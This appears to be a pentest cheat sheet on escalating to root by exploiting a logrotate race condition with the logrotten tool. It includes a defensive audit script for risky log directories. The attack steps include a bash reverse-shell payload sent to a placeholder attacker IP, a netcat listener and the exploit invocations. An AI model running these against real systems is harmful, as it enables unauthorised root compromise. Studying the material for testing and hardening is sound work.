PRIMARY CATEGORY → LINUX PRIVESC
Theory
Configuration Files
/etc/logrotate.conf # Main Configuration File
/etc/logrotate.d # Additional Configuration Files
/var/lib/logrotate.status
Service Configuration Parameters
| DIRECTIVE | DESCRIPTION |
|---|---|
| weekly, daily, monthly, yearly | Specifies the rotation frequency (e.g. weekly → at most once a week) |
| rotate N | Keeps N rotated logs before deleting the oldest one |
| create | After renaming the given log file, creates a new empty file with the same name |
| compress | Compresses the old rotated logs |
Abuse
Race Condition
Vulnerable Versions → 3.8.6, 3.11.0, 3.15.0 and 3.18.0
Requirements
- Write permissions on the Log Files Path
- LogRotate must run as Root or another privileged user
- LogRotate binary must be vulnerable ( Check versions above )
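
A defensive counterpart to the requirements above, as an added example (not part of the original page or of logrotten): a POSIX shell audit that reads a logrotate config and reports every log path whose directory is writable by someone other than root while `create` or `compress` is in effect. The names `audit_logrotate_conf`, `dir_is_untrusted` and `TRUSTED_UID` are hypothetical; the parser assumes unquoted paths, does not follow `include` lines, and skips directories it cannot resolve (for example a glob in the directory part).

```sh
#!/bin/sh
# Added audit example (hypothetical helper names, not logrotate's or logrotten's code).
TRUSTED_UID=${TRUSTED_UID:-0}   # assumption: only this uid should own log directories

# True when directory $1 is group/other-writable or not owned by TRUSTED_UID.
dir_is_untrusted() {
    meta=$(ls -ldn "$1" 2>/dev/null) || return 1   # unresolvable dir: nothing to flag
    read -r mode links uid rest <<EOF
$meta
EOF
    case $mode in ?????w*|????????w*) return 0 ;; esac   # g+w or o+w bit set
    [ "$uid" != "$TRUSTED_UID" ]
}

# Prints one "RISK ..." line per affected log path in config file $1.
audit_logrotate_conf() {
    conf=$1 in_block=0 paths= hit= global_hit=
    set -f                                   # keep globs such as *.log literal
    while IFS= read -r line || [ -n "$line" ]; do
        set -- ${line%%#*}                   # drop comments, split into words
        [ $# -gt 0 ] || continue
        if [ "$in_block" -eq 0 ]; then
            case $1 in
                include) continue ;;
                create|compress) global_hit=$1; continue ;;   # global default
            esac
            for w in "$@"; do
                case $w in
                    "{") in_block=1 hit=$global_hit ;;
                    /*) paths="$paths $w" ;;
                esac
            done
        else
            case $1 in
                create|compress) hit=$1 ;;
                "}")
                    for p in $paths; do
                        d=$(dirname "$p")
                        if [ -n "$hit" ] && dir_is_untrusted "$d"; then
                            echo "RISK $p dir=$d directive=$hit"
                        fi
                    done
                    in_block=0 paths= hit= ;;
            esac
        fi
    done < "$conf"
    set +f
}
# Usage: sh audit.sh /etc/logrotate.conf /etc/logrotate.d/*
for f in "$@"; do audit_logrotate_conf "$f"; done
```

Any reported directory should be owned by root and have group/other write removed, and the installed logrotate version should be checked against the vulnerable versions listed on this page.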
Enumeration
From the Target 🎯
- LogRotate Version
logrotate -v
- Log files for which the current user has write permissions
find / -regextype posix-extended -iregex '.*(\.|_)log' -writable 2> /dev/null
Cloning the GitHub Repository
From the Attacker ⚔️
git clone https://github.com/whotwagner/logrotten logrotten
Compiling the Binary
From the Target ( If possible ) 🎯
cd !$ && gcc -o logrotten logrotten.c
chmod 700 ./logrotten
Creating the Payload
From the Target 🎯
echo 'bash -i &> /dev/tcp/<ATTACKER_IP>/<PORT> 0>&1' > payload
Checking LogRotate Option
Create or Compress
From the Target 🎯
grep -RiP --color -- "^[^#]*(create|compress)" /etc/logrotate.conf /etc/logrotate.d/ 2> /dev/null
Setting a TCP Listener
From the Attacker ⚔️
nc -nlvp <PORT>
Running the exploit
From the Target 🎯
- Create
./logrotten -p ./payload /tmp/pwnme.log
- Compress
./logrotten -p ./payload -c -s 4 /tmp/pwnme.log
Resources
Linux Privesc with LogRotate Utility